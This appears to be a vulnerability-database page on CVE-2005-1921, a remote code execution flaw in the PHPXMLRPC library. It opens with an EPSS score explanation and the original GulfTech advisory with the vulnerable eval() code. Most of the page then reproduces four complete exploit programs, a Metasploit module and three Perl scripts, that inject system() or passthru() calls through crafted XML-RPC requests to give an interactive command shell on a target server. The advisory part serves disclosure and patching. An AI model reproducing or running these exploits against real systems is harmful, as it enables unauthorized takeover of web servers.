The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

PHPXMLRPC Remote Code Execution Vendor: Useful Information Inc. Product: PHPXMLRPC Version: <= 1.1 Website: http://phpxmlrpc.sourceforge.net/ BID: 14088 CVE: CVE-2005-1921 OSVDB: 17793 SECUNIA: 15852 PACKETSTORM: 38394 Description: PHPXMLRPC aka XML-RPC For PHP is a PHP implementation of the XML-RPC web RPC protocol, and was originally developed by Edd Dumbill of Useful Information Company. As of the 1.0 stable release, the project has been opened to wider involvement and moved to SourceForge. PHPXMLRPC is used in a large number of popular web applications such as PostNuke, Drupal, b2evolution, and TikiWiki. Unfortunately PHPXMLRPC is vulnerable to a remote php code execution vulnerability that may be exploited by an attacker to compromise a vulnerable system. Remote Code Execution: PHPXMLRPC is vulnerable to a very high risk remote php code execution vulnerability that may allow for an attacker to compromise a vulnerable webserver. The vulnerability is the result of unsanatized data being passed directly into an eval() call in the parseRequest() function of the XMLRPC server. // decompose incoming XML into request structure xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, true); xml_set_element_handler($parser, "xmlrpc_se", "xmlrpc_ee"); xml_set_character_data_handler($parser, "xmlrpc_cd"); xml_set_default_handler($parser, "xmlrpc_dh"); if (!xml_parse($parser, $data, 1)) { // return XML error as a faultCode $r=new xmlrpcresp(0, $xmlrpcerrxml+xml_get_error_code($parser), sprintf("XML error: %s at line %d", xml_error_string(xml_get_error_code($parser)), xml_get_current_line_number($parser))); xml_parser_free($parser); } else { xml_parser_free($parser); $m=new xmlrpcmsg($_xh[$parser]['method']); // now add parameters in $plist=""; for($i=0; $i\n"; $plist.="$i - " . $_xh[$parser]['params'][$i]. " \n"; eval('$m->addParam(' . $_xh[$parser]['params'][$i]. ");"); } By creating an XML file that uses single quotes to escape into the eval() call an attacker can easily execute php code on the target server. This has a lot to do with the fact that magic_quotes_gpc() does not apply to $HTTP_RAW_POST_DATA so using single quotes is not a problem. test.method ','')); phpinfo(); exit;/* The above xml file when posted to the vulnerable server will cause the phpinfo() function call to be executed on the vulnerable server. Solution: An updated version of PHPXMLRPC can be downloaded from their official website, and all users are advised to upgrade immediately. http://sourceforge.net/project/showfiles.php?group_id=34455&package_id=26601 A special thanks to Ed Dumbill, Giunta Gaetano, and all of the other people that helped get this fix out, and all of the people who helped us try and track down developers who were using this third party XMLRPC library. Credits: James Bercegay of the GulfTech Security Research Team

## # $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient # XXX This module needs an overhaul def initialize(info = {}) super(update_info(info, 'Name' => 'PHP XML-RPC Arbitrary Code Execution', 'Description' => %q{ This module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki. }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ ['CVE', '2005-1921'], ['OSVDB', '17793'], ['BID', '14088'], ], 'Privileged' => false, 'Platform' => ['unix', 'solaris'], 'Payload' => { 'Space' => 512, 'DisableNops' => true, 'Keys' => ['cmd', 'cmd_bash'], }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2005' )) register_options( [ OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']), ], self.class) deregister_options( 'HTTP::junk_params', # not your typical POST, so don't inject params. 'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. ) end def go(command) encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.') wrapper = rand_text_alphanumeric(rand(128)+32) cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;" xml = '' + "" + ""+ rand_text_alphanumeric(rand(128)+32) + "" + "" + "" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//" + "" + rand_text_alphanumeric(rand(128)+32) + "" + "" + ""; res = send_request_cgi({ 'uri' => datastore['PATH'], 'method' => 'POST', 'ctype' => 'application/xml', 'data' => xml, }, 5) if (res and res.body) b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] elsif datastore['HTTP::chunked'] == true b = /chunked Transfer-Encoding forbidden/.match(res.body) if b raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.' end end end return nil end def check response = go("echo ownable") if (!response.nil? and response =~ /ownable/sm) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit response = go(payload.encoded) if response == nil print_error('exploit failed: no response') else if response.length == 0 print_status('exploit successful') else print_status("Command returned #{response}") end handler end end end

# tested and working /str0ke #!/usr/bin/perl # # ilo-- # # This program is no GPL or has nothing to do with FSF, but some # code was ripped from romansoft.. sorry, too lazy! # # xmlrpc bug by James from GulfTech Security Research. # http://pear.php.net/bugs/bug.php?id=4692 # xmlrpc drupal exploit, but James sais xoops, phpnuke and other # cms should be vulnerable. # # greets: dsr! digitalsec.net # require LWP::UserAgent; use URI; use Getopt::Long; use strict; $| = 1; # fflush stdout after print # Default options # connection my $basic_auth_user = ''; my $basic_auth_pass = ''; my $proxy = ''; my $proxy_user = ''; my $proxy_pass = ''; my $conn_timeout = 15; # general my $host; #informational lines to feed my own ego. print "xmlrpc exploit - http://www.reversing.org \n"; print "2005 ilo-- \n"; print "special chars allowed are / and - \n\n"; # read command line options my $options = GetOptions ( #general options 'host=s' => \$host, # input host to test. # connection options 'basic_auth_user=s' => \$basic_auth_user, 'basic_auth_pass=s' => \$basic_auth_pass, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'timeout=i' => \$conn_timeout); # command line sanity check &show_usage unless ($host); # main loop while (1){ print "\nxmlrpc@# "; my $cmd = ; xmlrpc_xploit ($cmd); } exit (1); #exploit sub xmlrpc_xploit { chomp (my $data = shift); my $reply; my $d1 = "examples.getStateNamea');"; my $d2 = ";//xml exploit R/01"; $data =~ s/-/'.chr(45).'/mg; $data =~ s/\//'.char(47).'/mg; my $req = new HTTP::Request 'POST' => $host; $req->content_type('application/xml'); $req->content($d1.'system(\''.$data.'\')'.$d2); my $ua = new LWP::UserAgent; $ua->agent("xmlrpc exploit R/0.1"); $ua->timeout($conn_timeout); if ($basic_auth_user){ $req->authorization_basic($basic_auth_user, $basic_auth_pass) } if ($proxy){ $ua->proxy(['http'] => $proxy); $req->proxy_authorization_basic($proxy_user, $proxy_pass); } #send request, return null if not OK my $res = $ua->request($req); if ($res->is_success){ $reply= $res->content; } else { $reply = ""; } $reply =~ /(.*).(

warning.*)/mgsi;
  print ($1);
}

# show options
sub show_usage {
  print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
  print "main options\n";
  print "connection options\n";
  print "\t--proxy (http), --proxy_user, --proxy_pass\n";
  print "\t--basic_auth_user, --basic_auth_pass\n";
  print "\t--timeout \n";
  print "\nExample\n";
  print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
  print "\n";
  exit(1);
}


# milw0rm.com [2005-07-01]

#-------------------------------------------------------# # /| # # | | # # | | # # /\ ________| |___ # # / \ \_______ __/ # # / \|\_____ | | _ _ _ _ ()___ # # / /\ \ ___ \ | |<_> / | | | || \ || | | | # # / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| # # / ______ \ | || || | / | | | || \ || | | # # / / \ \ | || || | / |_ |_ |_|| \|| | \_| # # \_/ |\_/ | || || | ___ _ _ # # | | | || /| | | | | ||\/| # # \| \||/ \| | |_ |_|| | # # | | | || | # # | |_ | || | # # # # Original advisory by http://gulftech.org/ # # Exploit coded by dukenn (http://asteam.org) # # # #------------------------------------------------------- #!/usr/bin/perl use IO::Socket; print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n"; if ($ARGV[0] && $ARGV[1]) { $host = $ARGV[0]; $xml = $ARGV[1]; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n"; while (1) { print '['.$host.']# '; $cmd = ; chop($cmd); last if ($cmd eq 'exit'); $xmldata = "test.method',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*"; print $sock "POST ".$xml." HTTP/1.1\n"; print $sock "Host: ".$host."\n"; print $sock "Content-Type: text/xml\n"; print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata; $good=0; while ($ans = <$sock>) { if ($good == 1) { print "$ans"; } last if ($ans =~ /^_end_/); if ($ans =~ /^_begin_/) { $good = 1; } } if ($good==0) {print "Exploit Failed\n";exit();} } } else { print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n"; print "Example: perl xml.pl target.com /script/xmlrpc.php\n"; exit; } # milw0rm.com [2005-07-04]

#!/usr/bin/perl -w # ******************************************************** # XML-RPC Remote Command Execution Exploit By Mike Rifone # ******************************************************** # This works on da phpxmlrpc, and da PEAR XML_RPC too! All # you need is to put the url to the server and u get shell # Dis is my first exploit but hey it works :D ~Mike@Rifone # ******************************************************** use LWP::UserAgent; $brws = new LWP::UserAgent; $brws->agent("Internet Explorer 6.0"); $host = $ARGV[0]; if ( !$host ) { die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver"); } while ( $host ) { print "xmlrpc\@\#"; $exec = ; $data = "foo.bar1111','')); system('$exec'); die; /*"; $send = new HTTP::Request POST => $host; $send->content($data); $gots = $brws->request($send); $show = $gots->content; if ( $show =~ /([\d]{1,10})<\/b>
(.*)/is ) { print $2 . "\n"; } else { print "$show\n"; } } # milw0rm.com [2005-07-04]